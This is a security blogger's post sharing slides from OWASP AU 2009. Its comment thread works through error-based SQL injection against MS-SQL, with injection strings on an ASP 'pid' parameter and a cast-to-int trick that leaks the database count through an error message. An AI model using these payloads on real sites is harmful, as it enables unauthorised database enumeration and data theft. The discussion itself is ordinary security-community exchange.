Slides From OWASP Au 2009

March 19, 2009

Here are my slides from OWASP AU 2009.

Send Comments/feedbacks at sid–at–notsosecure.com

Comments

6 Comments

  • Benjamin says:

    Hey Sumsid!

    Thanks for those slides 🙂

  • Marezzi says:

    nice slides 🙂 I have 1 question, how can i count how many databases are there via sql injection in MS-SQL?I want to apply this query. Select count(CATALOG_NAME) from INFORMATION_SCHEMA.SCHEMATA)), or Select count(name) from master.dbo.sysdatabases
    Thanks

  • sid says:

    i think you are after this:

    Select count(distinct name) from master.dbo.sysdatabases

    or you can do select db_name(n)

    and enumerate n till you get null.

    Hope it helps …:)

  • Marezzi says:

    tnx for info but not working.I know for the db_name(n) but i need this. asp?pid=12 or 1=convert(int,(Select count(distinct name) from master.dbo.sysdatabases))–
    I don’t see an error. also tried asp?pid=12 or 1=convert(int,(Select count(distinct catalog_name) from information_schema.schemata))– no success
    Don’t know what to do

  • sid says:

    Thats because, the query returns an integer, and type conversion from int to int is valid and hence no errors.

    I will look for some more type conversions to get this returned as error message.

    You can still use the blind injection boolean query to get this value, but i think i know what are you after.. 🙂

  • sid says:

    select cast(‘total database:’+cast(count(name) as nvarchar)as int) from master.dbo.sysdatabases

    Msg 245, Level 16, State 1, Line 1
    Conversion failed when converting the nvarchar value ‘total database:6’ to data type int.

Leave a Reply

Your email address will not be published. Required fields are marked *

Trackback